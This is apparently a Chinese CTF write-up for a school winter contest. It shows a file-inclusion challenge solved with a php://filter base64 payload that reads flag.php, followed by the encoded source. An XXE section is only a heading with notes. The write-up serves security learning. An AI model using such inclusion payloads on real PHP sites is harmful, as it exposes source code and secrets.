以下内容为本次XJUSEC寒假赛个人完成题目的WP
WEB
Include
打开题目后发现如下
通过学习了解到文件包含漏洞的有关知识,构造payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64加密后的源码:
PD9waHANCgkkZmxhZyA9ICdmbGFne2luY2x1ZDNfczBfZXp9JzsNCj8+DQo8aHRtbD4NCjxoZWFkPg0KCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCgk8dGl0bGU+WEpVU0VDIE9OTElORTwvdGl0bGU+DQoJPHN0eWxlPiANCgkJYm9keXt0ZXh0LWFsaWduOmNlbnRlcn0gDQoJPC9zdHlsZT4NCjwvaGVhZD4NCg0KPGJvZHk+DQoNCjxib2R5Pg0KDQoJPHA+ZmxhZ+WwseWcqOi/memHjO+8jOS9huWwseaYr+eci+S4jeWIsO+8jOWlveawlOWTpu+8gTwvcD4NCg0KPC9ib2R5Pg0KDQoJDQo8L2h0bWw+
解密:
Xxe
先学习,再做题
抓包